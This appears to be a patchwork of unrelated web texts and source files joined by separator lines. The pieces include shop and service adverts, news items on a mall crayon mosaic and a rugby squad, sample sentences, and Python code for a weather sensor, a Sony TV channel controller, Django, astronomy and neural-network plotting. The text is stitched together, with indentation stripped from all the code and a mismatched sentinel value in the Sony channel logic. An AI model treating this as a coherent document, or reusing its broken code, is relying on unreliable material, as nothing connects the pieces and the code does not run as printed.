Use the chart as a guide & adjust as necessary to maintain proper weight. Feeding portion may vary according to age, breed, climate & temperament. Fresh water is essential and should be available at all times.
Enter the quantity and click "add to cart". When you are ready to pay for your order proceed to checkout. Payment is made by credit card on a secure server alternatively you may pay by "bank deposit" or by phone on 0800 DOG FOOD (364 366).
For trade enquiries or bulk orders please contact us.
“Hi there, they loved it! I am now giving them the biscuits for their daytime feeds and only using wet food in the morning as they are still so young (7weeks today). I am thrilled with the price. I've heard about your cat line as well and am spreading the word.
Thanks for the samples, very welcome!
© Petfood Direct. All rights reserved.
|
#!/usr/bin/python
from Adafruit_BMP085 import BMP085
import re, os, rrdtool, time
# function: read and parse sensor data file
def read_sensor(path):
value = "U"
try:
f = open(path, "r")
line = f.readline()
if re.match(r"([0-9a-f]{2} ){9}: crc=[0-9a-f]{2} YES", line):
line = f.readline()
m = re.match(r"([0-9a-f]{2} ){9}t=([+-]?[0-9]+)", line)
if m:
value = str(float(m.group(2)) / 1000.0)
f.close()
except (IOError), e:
print time.strftime("%x %X"), "Error reading", path, ": ", e
return value
# define pathes to 1-wire sensor data
path = ("/sys/bus/w1/devices/10-0008002ff245/w1_slave")
# read sensor data
tempout = float(read_sensor(path))
time.sleep(1)
#########################################################################
# Initialise the BMP085 and use STANDARD mode
bmp = BMP085(0x77)
tempin = bmp.readTemperature()
# Read the current barometric pressure level
pressure = bmp.readPressure()
# Set the altitude of your current location in meter
altitude = 301
psea = pressure / pow(1.0 - altitude/44330.0, 5.255)
print "Outside Temp: %.2f C" % tempout
print "Inside Temp: %.2f C" % tempin
print "Pressure: %.2f hPa" % (pressure / 100.0)
print "Pressure at sea level: %8.2f hPa" % (psea / 100.0)
time.sleep(1)
# insert data into round-robin-database
data = "N:%.2f:%.2f:%8.2f" % (tempin, tempout, psea/100.0)
rrdtool.update(
"%s/weather.rrd" % (os.path.dirname(os.path.abspath(__file__))),
data)
|
I was amazed with the outcome of the Animal Tales Fundraising Program at Cheras LeisureMall that started last month. It was a fundraising initiative in partnership with Crayola Malaysia to support SPCA Selangor’s animal welfare advocacy and to create ‘The Biggest Mosaic Made of Crayons’ for in Crayons’ for the Malaysia Book of Records, as well as the Guinness World Records to raise awareness on animal welfare issues.
This initiative truly sparked the creativity and build community engagement in partnership with Crayola Malaysia. It looks as if the animals are ‘alive’ and seen ‘roaming free’ on a giant safari mosaic made of recycled crayons.
It was artistically constructed at Level 2 Cravings Lane, Cheras LeisureMall, shoppers will be captivated by a giant mosaic depicting a harmonious group of animals living in the wild, measuring 10.28 metres in length and 6.97 metres in width.
The animals are brought to life with 3 tonnes of recycled crayon pieces and 2,270 mini mosaics, the masterpiece is a result of a community engagement initiative, whereby more than 2,000 participants of all walks of life from as young as a 4-year old child to an 80-year old participant who came together through a common passion for animal welfare issues.
Animal Tales Fundraising Program was held from 15 – 31 July 2017, where participants had the opportunity to build mini mosaics using recycled Crayola crayon pieces with a participation fee of RM10 each. The mini mosaics were then combined and repurposed to create the ‘Biggest Mosaic Made of Crayons’, which became an iconic showpiece at Cheras LeisureMall to raise public awareness about animal protection and conservation.
Cheras LeisureMall is working closely with the Society for Prevention of Cruelty to Animals (SPCA) Selangor, the beneficiary of this initiative, the giant mosaic also seeks to encourage and instill compassion, respect, and empathy towards animals, so that all living creatures may live together in harmony.
This initiative not only gives a great experience to the customers but also instill greater awareness on the importance of humane treatment to animals. It garnered tremendous support from the community, as Cheras LeisureMall managed to raise RM22,500 from the fundraising drive, and PPB Group Berhad (the management of Cheras LeisureMall) will contribute an equivalent amount to channel a total of RM45,000 to SPCA Selangor.
Cheras LeisureMall was awarded the ‘Biggest Mosaic Made of Crayons’ in Malaysia by the Malaysia Book of Records (MBR) upon the evaluation by MBR representatives at the kick-off event. Both Cheras LeisureMall and Crayola Malaysia are also in the midst of submitting for the Guinness Book of Records’ accreditation. The giant mosaic is now on display at Cheras LeisureMall for public viewing.
Animal Tales Fundraising Program is Cheras LeisureMall’s maiden animal welfare-driven initiative aimed at championing the noble cause of animal conservation and protection. It is also aligned with Cheras LeisureMall’s commitment to promote community-driven activities by contributing and engaging with the communities in which the company operates, and with the society at large.
Very nice mosaic artwork, nice to meet your there too.
Wow~ Impress with their talented drawing here.
Say no to animal cruelty. A good charity to create awareness to the public and help the animals in the world.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-09-04 17:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Transaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_email', models.EmailField(max_length=254)),
('delta', models.IntegerField()),
('note', models.TextField(blank=True, null=True)),
('balance', models.PositiveIntegerField(help_text='The balance total at this point in the log. This value exists strictly for performance reasons when calculating current balance.')),
('created', models.DateTimeField(auto_now_add=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AdministrativeTransaction',
fields=[
('transaction_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='economy.Transaction')),
],
options={
'abstract': False,
},
bases=('economy.transaction',),
),
migrations.CreateModel(
name='ForexTransaction',
fields=[
('transaction_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='economy.Transaction')),
('currency_value', models.PositiveIntegerField()),
('credits_purchased', models.PositiveIntegerField()),
],
options={
'abstract': False,
},
bases=('economy.transaction',),
),
migrations.CreateModel(
name='ItemPurchaseTransaction',
fields=[
('transaction_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='economy.Transaction')),
('quantity', models.PositiveIntegerField(help_text='Number of items purchased')),
],
options={
'abstract': False,
},
bases=('economy.transaction',),
),
migrations.CreateModel(
name='SpoilsTransaction',
fields=[
('transaction_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='economy.Transaction')),
],
options={
'abstract': False,
},
bases=('economy.transaction',),
),
migrations.AddField(
model_name='transaction',
name='polymorphic_ctype',
field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_economy.transaction_set+', to='contenttypes.ContentType'),
),
]
|
Are you looking for reliable and trust worthy Packers and movers in Kondapur then you have come to the right place we are known as best packers and movers in Kondapur area and near buy. We offer following services of packing and moving services who are staying in Kondapur like Packing and Unpacking Services, Loading and unloading Services, Household Goods Moving Services, Door to Door Shifting Services, Office Relocation Services, Car Transportation Services to all residents and office located in Kondapur area.
Transmove relocation have well trained and experienced packers who understand your valuables very much which you are shifting, first we segregate the products which will broke easy or which damages easy and costly and pack them in bubble raps and cartoons so that it will not damage easily. Then moving of products we shift this household as well as office furniture from Kondapur to any part of the country in closed containers so that external environmental factors do not have impact on this. We have successfully executed thousands of house shifting in Kondapur area.
Transmove is known for quality packers and movers service in Kondapur and Hyderabad areas we know each and every area in Kondapur , it is easy to find your location in Kondapur area for packing your house holds and office goods from door step in Kondapur .
We pack and move house hold item from Kondapur to any part of India, some of the destination we move on regular basics are Bangalore, Chennai, Kolkata, Pune, Delhi, Bhopal, Kerala etc.
Just call us for packing and moving in Kondapur we will be at your place we give quote, take order, shift on date required and move the goods to desired location and unpack them at your new destination from Kondapur . The Process is simple when you choose transmove relocation services . for best experience please call us for all packers and movers in Kondapur .
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 22 11:55:10 2016
@author: liys
"""
import pickle, sqlite3
from queue import PriorityQueue
import matplotlib.pyplot as plt
from OffRoadPlanning import load_forward_path_primitives, load_reverse_path_primitives, test_load_path_primitives, \
test_load_motion_primitives, State
# test_load_path_primitives()
# test_load_motion_primitives()
# primitives1 = load_forward_path_primitives()
# primitives2 = load_reverse_path_primitives()
motion_primitives = {}
with open('motion_primitives2.pickle', 'rb') as f:
motion_primitives.update(pickle.load(f))
conn = sqlite3.connect('InitialGuessTable.db')
cursor = conn.cursor()
start = State(index=(50,50,-5,-1), time=10., length=50., cost=0.)
pq = PriorityQueue()
pq.put(start)
node_dict = {start.index:start}
edge_dict = {}
times = 0
while times < 100 and not pq.empty():
times += 1
state = pq.get()
print(state.index)
State.ControlSet(state, motion_primitives, pq, node_dict, edge_dict)
print(len(edge_dict))
for traj in edge_dict.values():
plt.plot(traj[:,2], traj[:,3])
for state in node_dict.values():
plt.plot(state.state[0], state.state[1], 'ro')
# print(state.priority)
plt.axis('equal')
plt.show()
cursor.close()
conn.close()
|
Cathrin makes her living by sewing.
Old sent a telegram to Huashi.
Laurent is holding something behind his back.
Are you really going on the date with Butler?
Soohong didn't really feel like going to school this morning.
Varda said that he and Gregor can't come to our party.
Celeste was worried that Raymond's words were indirectly aimed at him, but in truth she was only talking about herself in a self-depreciating manner.
Did you really threaten to kill The?
How much was Tharen making on his last job?
Elaine is an avid tennis player.
Thuan plans to go in spite of the bad weather.
Who's going to tell Seth they can't do that?
Sam asked Roderick many questions that she couldn't answer.
They zapped Gail with the defibrillator.
Piercarlo was just a kid at that time.
Jennie told me he wasn't happy here.
Alexis tried to climb over the fence.
Joubert isn't very obedient, is he?
Moses helped the little old lady to cross the road.
Diana made us feel welcome.
Fritz jumped out of his bed.
How did you know Walter would do that?
Huashi wanted to learn to swim.
Srinivasan stayed with his father.
I don't like the way Miriamne did that.
|
# -*- coding: utf-8 -*-
#
# SonyAPI
# External control of Sony Bravia Generation 3 TV's
# Copyright (C) 2017 Kevin G. Schlosser
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from __future__ import absolute_import
from . import media
from .api_const import PY2
class Channels(object):
def __init__(self, sony_api):
self._sony_api = sony_api
@property
def _channel(self):
return self._sony_api.now_playing.display_num
@property
def lineup(self):
content_items = []
for source in self._sony_api.source_list:
if source.uri.startswith('tv'):
content_list = self._sony_api.send(
'avContent',
'getContentList',
source=source.uri
)
for content in content_list:
content['source'] = source
content_items += [
media.ContentItem(self._sony_api, **content)
]
return content_items
def _set_channel(self, direction, channel):
for chan in self.lineup:
if chan.display_num == str(channel):
chan.set()
return channel
selected_channel = None
new_channel = 999999 if direction == 'up' else 0
for chan in self.lineup:
if direction == 'up':
if (
new_channel >
int(chan.display_num) >
channel
):
selected_channel = chan
new_channel = int(chan.display_num)
else:
if (
new_channel <
int(chan.display_num) <
channel
):
selected_channel = chan
new_channel = int(chan.display_num)
if new_channel == 999999999:
for chan in self.lineup:
if new_channel > int(chan.display_num):
selected_channel = chan
new_channel = int(chan.display_num)
if new_channel == 0:
for chan in self.lineup:
if new_channel < int(chan.display_num):
selected_channel = chan
new_channel = int(chan.display_num)
if selected_channel is not None:
selected_channel.set()
return selected_channel
def up(self):
return self._set_channel('up', int(self._channel) + 1)
def down(self):
return self._set_channel('down', int(self._channel) - 1)
def __lt__(self, other):
return int(self._channel) < int(other)
def __le__(self, other):
return int(self._channel) <= int(other)
def __eq__(self, other):
return int(self._channel) == int(other)
def __ne__(self, other):
return int(self._channel) != int(other)
def __gt__(self, other):
return int(self._channel) > int(other)
def __ge__(self, other):
return int(self._channel) >= int(other)
def __add__(self, other):
return int(self._channel) + int(other)
def __sub__(self, other):
return int(self._channel) - int(other)
def __mul__(self, other):
return int(self._channel) * int(other)
def __div__(self, other):
return int(self._channel) / int(other)
def __iadd__(self, other):
return self._set_channel('up', int(self._channel) + int(other))
def __isub__(self, other):
return self._set_channel('down', int(self._channel) - int(other))
def __imul__(self, other):
return self._set_channel('up', int(self._channel) * int(other))
def __idiv__(self, other):
return self._set_channel('down', int(self._channel) / int(other))
def __int__(self):
return int(self._channel)
def __str__(self):
return str(self._channel)
if PY2:
def __unicode__(self):
return unicode(str(self))
|
The Aquis Gold Coast Titans have had five players selected in the Australian Prime Minister’s XIII train-on squad, including rookie halfback Kane Elgey.
The Australian Rugby League Commission named the squad this afternoon. Titans players included are Elgey, James Roberts, Kierran Moseley, Ryan James and Beau Falloon.
The squad, which will be coached by Penrith Panthers’ Ivan Cleary, has been selected from the teams which will not take part in the finals series. More players will be added from the teams eliminated from the finals this weekend.
The final team will be announced on September 15 for the match which will be played in Port Moresby on Saturday, September 26.
There is no other international activity for Australian players this year, while New Zealand will tour England in October-November.
Cleary, who will coach the Prime Minister’s XIII for the first time, said he was excited to work with a squad featuring such talent.
“I’m very grateful for the opportunity, and I’m particularly looking forward to working with some of the younger players who have bright futures,” he said.
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import collections
import numpy as np
from . import dusts
__ver__ = '1.0'
class sfh_wrapper(object):
""" sfh_wrapper class. EzGal wraps this class around the sfh function. It takes care of the
details of passing or not passing parameters """
func = '' # sfh function
args = () # extra arguments to pass on call
has_args = False # whether or not there are actually any extra arguments
def __init__(self, function, args):
""" wrapper_obj = ezgal.sfhs.wrapper( function, args )
wrapper class. EzGal wraps this class around the sfh function. It takes care of the
details of passing or not passing parameters """
self.func = function
if type(args) == type(()) and len(args) > 0:
self.has_args = True
self.args = args
def __call__(self, val):
if self.has_args:
return self.func(val, *self.args)
else:
return self.func(val)
class numeric(object):
ages = np.array([])
sfr = np.array([])
def __init__(self, ages, sfr):
""" numeric_obj = ezgal.sfhs.numeric( ages, sfrs )
wrapper class for making a numeric star formation history callable.
Pass a list of ages and relative star formation rates. Ages should be in gyrs. """
self.ages = np.asarray(ages)
self.sfr = np.asarray(sfr)
def __call__(self, val):
return np.interp(val, self.ages, self.sfr)
def exponential(t, tau):
""" ezgal.sfhs.exponential( ages, tau )
exponentially decaying star formation history with
e-folding time scale of tau gyrs """
return np.exp(-1.0 * t / tau)
def constant(t, length):
""" ezgal.sfhs.constant( ages, length )
Burst of constant starformation from t=0 to t=length """
if type(t) == type(np.array([])):
sfr = np.zeros(t.size)
m = t <= length
if m.sum(): sfr[m] = 1.0
return sfr
else:
return 0.0 if t > length else 1.0
|
ala intellectual, structural, relationship capital.
their relationship(s) – contributory role to company products and services.
Exploiting a companies’ internal – external ‘relationship capital’ should be a (fiduciary) priority…because it (relationship capital) can serve as key differentiators in any market space and ‘pocket book’!
those which don’t and should be for selling, licensing, transferring, bartering, discarding, or allow to merge into open sources.
Michael D. Moberly m.moberly@kpstrat.com St. Louis ‘Business Intangible Asset Blog’ since May 2006, 600+ published blog posts ‘where one’s attention span, businesses intangible assets, and solutions converge’.
Effective Management Of Intangible Assets Is 'Mission Critical'!
|
"""Constants for the Alexa integration."""
from collections import OrderedDict
from homeassistant.const import TEMP_CELSIUS, TEMP_FAHRENHEIT
from homeassistant.components.climate import const as climate
from homeassistant.components import fan
DOMAIN = "alexa"
# Flash briefing constants
CONF_UID = "uid"
CONF_TITLE = "title"
CONF_AUDIO = "audio"
CONF_TEXT = "text"
CONF_DISPLAY_URL = "display_url"
CONF_FILTER = "filter"
CONF_ENTITY_CONFIG = "entity_config"
CONF_ENDPOINT = "endpoint"
CONF_CLIENT_ID = "client_id"
CONF_CLIENT_SECRET = "client_secret"
ATTR_UID = "uid"
ATTR_UPDATE_DATE = "updateDate"
ATTR_TITLE_TEXT = "titleText"
ATTR_STREAM_URL = "streamUrl"
ATTR_MAIN_TEXT = "mainText"
ATTR_REDIRECTION_URL = "redirectionURL"
SYN_RESOLUTION_MATCH = "ER_SUCCESS_MATCH"
DATE_FORMAT = "%Y-%m-%dT%H:%M:%S.0Z"
API_DIRECTIVE = "directive"
API_ENDPOINT = "endpoint"
API_EVENT = "event"
API_CONTEXT = "context"
API_HEADER = "header"
API_PAYLOAD = "payload"
API_SCOPE = "scope"
API_CHANGE = "change"
CONF_DESCRIPTION = "description"
CONF_DISPLAY_CATEGORIES = "display_categories"
API_TEMP_UNITS = {TEMP_FAHRENHEIT: "FAHRENHEIT", TEMP_CELSIUS: "CELSIUS"}
# Needs to be ordered dict for `async_api_set_thermostat_mode` which does a
# reverse mapping of this dict and we want to map the first occurrence of OFF
# back to HA state.
API_THERMOSTAT_MODES = OrderedDict(
[
(climate.HVAC_MODE_HEAT, "HEAT"),
(climate.HVAC_MODE_COOL, "COOL"),
(climate.HVAC_MODE_HEAT_COOL, "AUTO"),
(climate.HVAC_MODE_AUTO, "AUTO"),
(climate.HVAC_MODE_OFF, "OFF"),
(climate.HVAC_MODE_FAN_ONLY, "OFF"),
(climate.HVAC_MODE_DRY, "CUSTOM"),
]
)
API_THERMOSTAT_MODES_CUSTOM = {climate.HVAC_MODE_DRY: "DEHUMIDIFY"}
API_THERMOSTAT_PRESETS = {climate.PRESET_ECO: "ECO"}
PERCENTAGE_FAN_MAP = {
fan.SPEED_OFF: 0,
fan.SPEED_LOW: 33,
fan.SPEED_MEDIUM: 66,
fan.SPEED_HIGH: 100,
}
RANGE_FAN_MAP = {
fan.SPEED_OFF: 0,
fan.SPEED_LOW: 1,
fan.SPEED_MEDIUM: 2,
fan.SPEED_HIGH: 3,
}
SPEED_FAN_MAP = {
0: fan.SPEED_OFF,
1: fan.SPEED_LOW,
2: fan.SPEED_MEDIUM,
3: fan.SPEED_HIGH,
}
class Cause:
"""Possible causes for property changes.
https://developer.amazon.com/docs/smarthome/state-reporting-for-a-smart-home-skill.html#cause-object
"""
# Indicates that the event was caused by a customer interaction with an
# application. For example, a customer switches on a light, or locks a door
# using the Alexa app or an app provided by a device vendor.
APP_INTERACTION = "APP_INTERACTION"
# Indicates that the event was caused by a physical interaction with an
# endpoint. For example manually switching on a light or manually locking a
# door lock
PHYSICAL_INTERACTION = "PHYSICAL_INTERACTION"
# Indicates that the event was caused by the periodic poll of an appliance,
# which found a change in value. For example, you might poll a temperature
# sensor every hour, and send the updated temperature to Alexa.
PERIODIC_POLL = "PERIODIC_POLL"
# Indicates that the event was caused by the application of a device rule.
# For example, a customer configures a rule to switch on a light if a
# motion sensor detects motion. In this case, Alexa receives an event from
# the motion sensor, and another event from the light to indicate that its
# state change was caused by the rule.
RULE_TRIGGER = "RULE_TRIGGER"
# Indicates that the event was caused by a voice interaction with Alexa.
# For example a user speaking to their Echo device.
VOICE_INTERACTION = "VOICE_INTERACTION"
class Catalog:
"""The Global Alexa catalog.
https://developer.amazon.com/docs/device-apis/resources-and-assets.html#global-alexa-catalog
You can use the global Alexa catalog for pre-defined names of devices, settings, values, and units.
This catalog is localized into all the languages that Alexa supports.
You can reference the following catalog of pre-defined friendly names.
Each item in the following list is an asset identifier followed by its supported friendly names.
The first friendly name for each identifier is the one displayed in the Alexa mobile app.
"""
LABEL_ASSET = "asset"
LABEL_TEXT = "text"
# Shower
DEVICENAME_SHOWER = "Alexa.DeviceName.Shower"
# Washer, Washing Machine
DEVICENAME_WASHER = "Alexa.DeviceName.Washer"
# Router, Internet Router, Network Router, Wifi Router, Net Router
DEVICENAME_ROUTER = "Alexa.DeviceName.Router"
# Fan, Blower
DEVICENAME_FAN = "Alexa.DeviceName.Fan"
# Air Purifier, Air Cleaner,Clean Air Machine
DEVICENAME_AIRPURIFIER = "Alexa.DeviceName.AirPurifier"
# Space Heater, Portable Heater
DEVICENAME_SPACEHEATER = "Alexa.DeviceName.SpaceHeater"
# Rain Head, Overhead shower, Rain Shower, Rain Spout, Rain Faucet
SHOWER_RAINHEAD = "Alexa.Shower.RainHead"
# Handheld Shower, Shower Wand, Hand Shower
SHOWER_HANDHELD = "Alexa.Shower.HandHeld"
# Water Temperature, Water Temp, Water Heat
SETTING_WATERTEMPERATURE = "Alexa.Setting.WaterTemperature"
# Temperature, Temp
SETTING_TEMPERATURE = "Alexa.Setting.Temperature"
# Wash Cycle, Wash Preset, Wash setting
SETTING_WASHCYCLE = "Alexa.Setting.WashCycle"
# 2.4G Guest Wi-Fi, 2.4G Guest Network, Guest Network 2.4G, 2G Guest Wifi
SETTING_2GGUESTWIFI = "Alexa.Setting.2GGuestWiFi"
# 5G Guest Wi-Fi, 5G Guest Network, Guest Network 5G, 5G Guest Wifi
SETTING_5GGUESTWIFI = "Alexa.Setting.5GGuestWiFi"
# Guest Wi-fi, Guest Network, Guest Net
SETTING_GUESTWIFI = "Alexa.Setting.GuestWiFi"
# Auto, Automatic, Automatic Mode, Auto Mode
SETTING_AUTO = "Alexa.Setting.Auto"
# #Night, Night Mode
SETTING_NIGHT = "Alexa.Setting.Night"
# Quiet, Quiet Mode, Noiseless, Silent
SETTING_QUIET = "Alexa.Setting.Quiet"
# Oscillate, Swivel, Oscillation, Spin, Back and forth
SETTING_OSCILLATE = "Alexa.Setting.Oscillate"
# Fan Speed, Airflow speed, Wind Speed, Air speed, Air velocity
SETTING_FANSPEED = "Alexa.Setting.FanSpeed"
# Preset, Setting
SETTING_PRESET = "Alexa.Setting.Preset"
# Mode
SETTING_MODE = "Alexa.Setting.Mode"
# Direction
SETTING_DIRECTION = "Alexa.Setting.Direction"
# Delicates, Delicate
VALUE_DELICATE = "Alexa.Value.Delicate"
# Quick Wash, Fast Wash, Wash Quickly, Speed Wash
VALUE_QUICKWASH = "Alexa.Value.QuickWash"
# Maximum, Max
VALUE_MAXIMUM = "Alexa.Value.Maximum"
# Minimum, Min
VALUE_MINIMUM = "Alexa.Value.Minimum"
# High
VALUE_HIGH = "Alexa.Value.High"
# Low
VALUE_LOW = "Alexa.Value.Low"
# Medium, Mid
VALUE_MEDIUM = "Alexa.Value.Medium"
class Unit:
"""Alexa Units of Measure.
https://developer.amazon.com/docs/device-apis/alexa-property-schemas.html#units-of-measure
"""
ANGLE_DEGREES = "Alexa.Unit.Angle.Degrees"
ANGLE_RADIANS = "Alexa.Unit.Angle.Radians"
DISTANCE_FEET = "Alexa.Unit.Distance.Feet"
DISTANCE_INCHES = "Alexa.Unit.Distance.Inches"
DISTANCE_KILOMETERS = "Alexa.Unit.Distance.Kilometers"
DISTANCE_METERS = "Alexa.Unit.Distance.Meters"
DISTANCE_MILES = "Alexa.Unit.Distance.Miles"
DISTANCE_YARDS = "Alexa.Unit.Distance.Yards"
MASS_GRAMS = "Alexa.Unit.Mass.Grams"
MASS_KILOGRAMS = "Alexa.Unit.Mass.Kilograms"
PERCENT = "Alexa.Unit.Percent"
TEMPERATURE_CELSIUS = "Alexa.Unit.Temperature.Celsius"
TEMPERATURE_DEGREES = "Alexa.Unit.Temperature.Degrees"
TEMPERATURE_FAHRENHEIT = "Alexa.Unit.Temperature.Fahrenheit"
TEMPERATURE_KELVIN = "Alexa.Unit.Temperature.Kelvin"
VOLUME_CUBICFEET = "Alexa.Unit.Volume.CubicFeet"
VOLUME_CUBICMETERS = "Alexa.Unit.Volume.CubicMeters"
VOLUME_GALLONS = "Alexa.Unit.Volume.Gallons"
VOLUME_LITERS = "Alexa.Unit.Volume.Liters"
VOLUME_PINTS = "Alexa.Unit.Volume.Pints"
VOLUME_QUARTS = "Alexa.Unit.Volume.Quarts"
WEIGHT_OUNCES = "Alexa.Unit.Weight.Ounces"
WEIGHT_POUNDS = "Alexa.Unit.Weight.Pounds"
class Inputs:
"""Valid names for the InputController.
https://developer.amazon.com/docs/device-apis/alexa-property-schemas.html#input
"""
VALID_SOURCE_NAME_MAP = {
"aux": "AUX 1",
"aux1": "AUX 1",
"aux2": "AUX 2",
"aux3": "AUX 3",
"aux4": "AUX 4",
"aux5": "AUX 5",
"aux6": "AUX 6",
"aux7": "AUX 7",
"bluray": "BLURAY",
"cable": "CABLE",
"cd": "CD",
"coax": "COAX 1",
"coax1": "COAX 1",
"coax2": "COAX 2",
"composite": "COMPOSITE 1",
"composite1": "COMPOSITE 1",
"dvd": "DVD",
"game": "GAME",
"gameconsole": "GAME",
"hdradio": "HD RADIO",
"hdmi": "HDMI 1",
"hdmi1": "HDMI 1",
"hdmi2": "HDMI 2",
"hdmi3": "HDMI 3",
"hdmi4": "HDMI 4",
"hdmi5": "HDMI 5",
"hdmi6": "HDMI 6",
"hdmi7": "HDMI 7",
"hdmi8": "HDMI 8",
"hdmi9": "HDMI 9",
"hdmi10": "HDMI 10",
"hdmiarc": "HDMI ARC",
"input": "INPUT 1",
"input1": "INPUT 1",
"input2": "INPUT 2",
"input3": "INPUT 3",
"input4": "INPUT 4",
"input5": "INPUT 5",
"input6": "INPUT 6",
"input7": "INPUT 7",
"input8": "INPUT 8",
"input9": "INPUT 9",
"input10": "INPUT 10",
"ipod": "IPOD",
"line": "LINE 1",
"line1": "LINE 1",
"line2": "LINE 2",
"line3": "LINE 3",
"line4": "LINE 4",
"line5": "LINE 5",
"line6": "LINE 6",
"line7": "LINE 7",
"mediaplayer": "MEDIA PLAYER",
"optical": "OPTICAL 1",
"optical1": "OPTICAL 1",
"optical2": "OPTICAL 2",
"phono": "PHONO",
"playstation": "PLAYSTATION",
"playstation3": "PLAYSTATION 3",
"playstation4": "PLAYSTATION 4",
"satellite": "SATELLITE",
"satellitetv": "SATELLITE",
"smartcast": "SMARTCAST",
"tuner": "TUNER",
"tv": "TV",
"usbdac": "USB DAC",
"video": "VIDEO 1",
"video1": "VIDEO 1",
"video2": "VIDEO 2",
"video3": "VIDEO 3",
"xbox": "XBOX",
}
|
New arrival Fresh Happy Girl Bikini Set With Front Bow Strappy Hipster. Fantastic print design. Inspired by the tropics. From the front it is a classic halterneck. Turn around and you have three spaghetti straps running from the neck to the back strap.
|
from _MultiNEAT import *
def Scale(a, a_min, a_max, a_tr_min, a_tr_max):
t_a_r = a_max - a_min
if t_a_r == 0:
return a_max
t_r = a_tr_max - a_tr_min
rel_a = (a - a_min) / t_a_r
return a_tr_min + t_r * rel_a
def Clamp(a, min, max):
if a < min:
return min
elif a > max:
return max
else:
return a
def AlmostEqual(a, b, margin):
if abs(a-b) > margin:
return False
else:
return True
try:
import cv2
import numpy as np
from numpy import array, clip
cvnumpy_installed = True
except:
print ('Tip: install the OpenCV computer vision library (2.0+) with '
'Python bindings')
print (' to get convenient neural network visualization to NumPy '
'arrays')
cvnumpy_installed = False
try:
import matplotlib.pyplot as plt
matplotlib_installed = True
except:
matplotlib_installed = False
if matplotlib_installed:
def render_nn(nn, ax=None,
is_substrate=False,
details=False,
invert_yaxis=True,
connection_alpha=1.0):
if ax is None:
ax = plt.gca()
if is_substrate:
ax.set_xlim(-1.1, 1.1)
ax.set_ylim(-1.1, 1.1)
node_radius = 0.05
else:
ax.set_xlim(-0.05, 1.05)
ax.set_ylim(-0.05, 1.05)
node_radius = 0.03
if invert_yaxis: ax.invert_yaxis()
# get the max weight
max_weight = max([c.weight for c in nn.connections])
# connections
for connection in nn.connections:
n1 = nn.neurons[connection.source_neuron_idx]
n2 = nn.neurons[connection.target_neuron_idx]
if is_substrate:
n1_x, n1_y = n1.substrate_coords[0], n1.substrate_coords[1]
n2_x, n2_y = n2.substrate_coords[0], n2.substrate_coords[1]
else:
n1_x, n1_y = n1.x, n1.y
n2_x, n2_y = n2.x, n2.y
offsetx = n2_x - n1_x
offsety = n2_y - n1_y
if offsetx == 0 or offsety == 0:
continue
# if going left->right, offset is a bit to the left and vice versa
# same for y
if n1_x - offsetx < 0:
ox = -node_radius * 0.9
elif n1_x - offsetx > 0:
ox = node_radius * 0.9
else:
ox = 0
if n1_y - offsety < 0:
oy = -node_radius * 0.9
elif n1_y - offsety > 0:
oy = node_radius * 0.9
else:
oy = 0
wg = clip(connection.weight, -2, 2)
if connection.weight > 0.0:
ax.arrow(n1_x, n1_y, offsetx+ox, offsety+oy, head_width = node_radius*0.8,
head_length = node_radius*1.2, fc='red', ec='red', length_includes_head=True,
linewidth = abs(wg),
alpha = connection_alpha*np.clip(0.1+abs(connection.weight)/max_weight, 0, 1))
else:
ax.arrow(n1_x, n1_y, offsetx+ox, offsety+oy, head_width = node_radius*0.8,
head_length = node_radius*1.2, fc='blue', ec='blue', length_includes_head=True,
linewidth = abs(wg),
alpha = connection_alpha*np.clip(0.1+abs(connection.weight)/max_weight, 0, 1))
# neurons
for index in range(len(nn.neurons)):
n = nn.neurons[index]
if is_substrate:
nx, ny = n.substrate_coords[0], n.substrate_coords[1]
else:
nx, ny = n.x, n.y
a = n.activation
if a < 0:
clr = array([0.3,0.3,0.3]) + array([0,0,0.5]) * (-a)
else:
clr = array([0.3,0.3,0.3]) + array([0.5,0,0]) * (a)
clr = clip(clr, 0, 1)
if n.type == NeuronType.INPUT:
ax.add_patch(plt.Circle((nx, ny), node_radius, ec='green', fc=clr, linewidth=3, zorder=2))
elif n.type == NeuronType.BIAS:
ax.add_patch(plt.Circle((nx, ny), node_radius, ec='black', fc=(1,1,1), linewidth=3, zorder=2))
elif n.type == NeuronType.HIDDEN:
ax.add_patch(plt.Circle((nx, ny), node_radius, ec='grey', fc=clr, linewidth=3, zorder=2))
elif n.type == NeuronType.OUTPUT:
ax.add_patch(plt.Circle((nx, ny), node_radius, ec='brown', fc=clr, linewidth=3, zorder=2))
def plot_nn(nn, ax=None,
is_substrate=False,
details=False,
invert_yaxis=True,
connection_alpha=1.0):
# if this is a genome, make a NN from it
if type(nn) == Genome:
kk = NeuralNetwork()
nn.BuildPhenotype(kk)
nn = kk
if is_substrate:
return render_nn(nn, ax,
is_substrate=True,
details=details,
invert_yaxis=invert_yaxis)
# not a substrate, compute the node coordinates
for i, n in enumerate(nn.neurons):
nn.neurons[i].x = 0
nn.neurons[i].y = 0
rect_x = 0
rect_y = 0
rect_x_size = 1
rect_y_size = 1
